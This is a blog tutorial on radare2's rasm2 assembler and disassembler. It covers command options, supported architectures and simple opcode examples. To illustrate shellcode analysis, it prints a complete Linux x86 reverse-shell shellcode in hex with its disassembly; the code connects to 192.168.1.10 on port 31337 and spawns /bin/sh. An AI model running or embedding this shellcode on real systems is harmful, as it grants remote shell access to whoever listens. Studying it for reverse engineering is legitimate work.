Sunday, March 16, 2014

radare2 reverse engineering framework: rasm2

radare and the new radare2 are an open source reverse engineering framework, which can be found here:

It has quite a few tools, and the webpage has excellent documentation, which is pretty good. In this post I want to review the "rasm2" assembler / disassembler utility, which is one of the main tools in the package. It can work on hex streams, files, opcodes, etc... quite a few options, as we can see from the help:

root@kali:~# rasm2 -h
rasm2 [-e] [-o offset] [-a arch] [-s syntax] -d "opcode"|"hexpairs"|- [-f file ..]
 -d           Disassemble from hexpair bytes
 -D           Disassemble showing hexpair and opcode
 -f           Read data from file
 -F [in:out]  Specify input and/or output filters (att2intel, x86.pseudo, ...)
 -o [offset]  Set start address for code (0x08048000)
 -a [arch]    Set architecture plugin
 -b [bits]    Set architecture bits
 -s [syntax]  Select syntax (intel, att)
 -B           Binary input/output (-l is mandatory for binary input)
 -l [int]     Input/Output length
 -C           Output in C format
 -L           List supported asm plugins
 -e           Use big endian
 -v           Show version information
 If '-l' value is greater than output length, output is padded with nops
 If the last argument is '-' reads from stdin

Here are just a few random disassemble examples:

root@kali:~# rasm2 -d 90
root@kali:~# rasm2 -d 53
push ebx
root@kali:~# rasm2 -d 44
inc esp

We can also reverse it:

root@kali:~# rasm2 "nop"
root@kali:~# rasm2 "nop;inc esp;push ebx"

It supports quite a few formats:

root@kali:~# rasm2 -L
ad  arm       ARM disassembly plugin
ad  armthumb  ARM THUMB disassembly plugin
_d  avr       AVR Atmel disassembler
ad  bf        Brainfuck disassembly plugin
_d  csr       CSR disassembly plugin
ad  dalvik    Dalvik (Android VM) disassembly plugin
ad  java      Java CLASS assembler/disassembler
_d  mips      MIPS disassembly plugin
_d  msil      MSIL disassembly plugin
_d  ppc       PPC disassembly plugin
_d  sh        SH-4 disassembly plugin
_d  sparc     SPARC disassembly plugin
_d  x86       udis86 disassembly plugin
a_    x86 assembler with non-zeros
ad  x86.olly  X86 disassembly plugin (olly engine)

It's very useful for shellcode analysis. I took the following as an example:

Although the assembly is on the site, but rasm2 can also show it nicely:

root@kali:~# rasm2 -d 31c031db31c931d2b066b301516a066a016a0289e1cd8089c6b06631dbb30268c0a8010a66687a696653fec389e16a10515689e1cd8031c9b103fec9b03fcd8075f831c052686e2f7368682f2f626989e3525389e15289e2b00bcd80
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
mov al, 0x66
mov bl, 0x1
push ecx
push 0x6
push 0x1
push 0x2
mov ecx, esp
int 0x80
mov esi, eax
mov al, 0x66
xor ebx, ebx
mov bl, 0x2
push dword 0xa01a8c0
push word 0x697a
push bx
inc bl
mov ecx, esp
push 0x10
push ecx
push esi
mov ecx, esp
int 0x80
xor ecx, ecx
mov cl, 0x3
dec cl
mov al, 0x3f
int 0x80
jnz 0x804803a
xor eax, eax
push edx
push dword 0x68732f6e
push dword 0x69622f2f
mov ebx, esp
push edx
push ebx
mov ecx, esp
push edx
mov edx, esp
mov al, 0xb
int 0x80

We can also specify an offset if we now where the given command will be in memory:

root@kali:~# rasm2 -o 0x8048060 "call 0x09080706"
root@kali:~# rasm2 -o 0x8048060 -d e8a1860301
call dword 0x9080706

No comments: